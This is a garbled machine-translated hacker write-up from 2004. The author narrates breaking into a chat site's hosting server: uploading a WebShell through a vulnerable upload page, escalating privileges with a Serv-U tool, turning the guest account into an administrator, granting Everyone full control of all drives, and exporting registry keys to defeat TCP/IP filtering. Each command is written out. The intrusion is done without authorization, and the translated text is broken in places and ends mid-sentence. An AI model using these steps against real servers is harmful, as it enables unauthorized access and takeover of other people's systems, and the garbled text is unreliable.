Date: 2004.12.11lvhuana 1: Get a small test of WebShell this evening, because I am too nick, I will not, I can only have this ......... I have passed There is no way to make up, I hope to understand this little post. Today is also bored one day, I am not bored at night, I have to go to a video chat site to see show, 嘿嘿 ~ Suddenly discovered a special fire of a chat room, the number of people have 500 people (full), brush N I didn't go in .......... More depressed! :( Think about it is nothing to do, test how the host is safe to do, huh, huh (too dish, saying that people safety is really raising yourself) Ping under CMD, then got the other party IP, then landed http://whois.Webhosting.info/ The other ip Take a look at the other sites, ha, this time, there are dozens of sites, it is estimated that I can still find a two-vulnerable site. Find, finally found a pages of a magical band vulnerability http://www.xxx.net/upfile_soft.asp, upload a WebShell (Haoyang 2005 official version) first (how to upload me is not Luo, uploading the tool now Floating). 2: Successfully improved permission to establish a user to get the WebShell, high-happily logged in, suddenly found any permissions, can only be turned in the directory where yourself is located (CDEF disk is not browsed), even delete The permissions of the file are not, depressed ...... Back to Server〗 Look at the mainframe, after discovering that he opened the terminal service and serv-u service, ha, this The head is ^ _ ^ Scan his IP with SuperScan, and then seeing the SERV-U and version 5.0 he used through Banner.
To 〖wscript.shell, let's try to execute the CMD command. You can't, if you enter the net user, you don't have it, then you can perform the CMD command through wscript.shell, and then enter the NET USER. Return each other's User list, haha, this It's good, I can get it! ! Upload SERV-U lifting tool to D: / A004 / TGGTWE / ****. COM / UPLOADSOFT directory below, rename: test.exe, then return to 〖wscript.shell to execute commands, 嘿嘿, immediately Only fat chicken is going to hand, please ING ~ Erhaw command with WScript.Shell: d: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "Net user guest / activ: YES" # Activation Guest Account, I like to use this account D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "net user guest lvhuana" # Set the password of the guest account to lvhuanad: / a004 / tggtwe / ** **. com / uploadsoft / test.exe "Net localgroup administrators guest / add" # enhances guest rights to Admin rights, the account is established, perform NET localgroup administrators to see success, by echoing knowing the addition of success.
Then when you perform NetStat -an, you see the terminal port of his open is the default 3389, OK, the connection is try ~ 3: Solve the TCP / IP filter connection! ? Halo ........... I took out Superscan to sweep his 3389, couldn't sweep at all ...... (opened firewall!? Rely, my little back .. ...) There is no way, return to WScript.shell again to perform CMD command: d: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "Cacls.exe C: / E / T / g Everyone : F "# Set the C disk to Everyone can browse D: / a004 / tggtwe / ****. Com / uploadsoft / test.exe" Cacls.exe D: / E / T / G Everyone: f "# put D The disc is set to Everyone can browse D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "Cacls.exe E: / E / E:" Set the E disk to Everyone can be viewed D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "Cacls.exe f: / e / t / g everyone: f" # Set the F disk to everyone can browse this minimum can be traversed throughout Hard drive, I have turned around in the hard disk, I haven't found his firewall file, there is a number in my heart, and it is definitely he for TCP / IP screening! (Of course, there is also the possibility of doing the server in the internal network. If you can determine from ipconfig -all) breakthrough TCP / IP filtering we can change his registry to achieve, what we have to do is to export three of his registry, After the changes are imported, return to 〖wscript.shell to perform the cmd command: D: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "regedit-E d: / A004 / TggTWE / * ***. com / uploadsoft / 1.REG HKEY_LOCAL_MACHINE / SYSTEM / Controlset001 / Services / TCPIP "# 导出: 册 表 关于 表 关于 表 第一 表 第一 表 第一 表 第一 表 第一: 第一: d / Test.exe "regedit-E d: / a004 / tggtwe / ****. com / uploadsoft / 2.reg hkey_local_machine / system / controlset002 / service / tcpip" 导 导 导 册 表 表 表 表 表 表 表 表D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "regedit -e d: / a004 / tggtwe / ****. Com / uploadsoft / 3.reg hkey_local_machine / system / currentControlset / Services / TCPIP "# Export the third place about TCP / IP filtering in the registration table and then return to 〖stream〗 or 〖FSO〗 Discovery 1.reg, 2.reg, 3.Reg is quiet lying there, 嘿嘿 ~ 1.Reg, 2.Reg, 3.REG Downloads back to your hard drive, change the TCP / IP screening, first open 1.Reg to find "EnableSecurityFilters" =
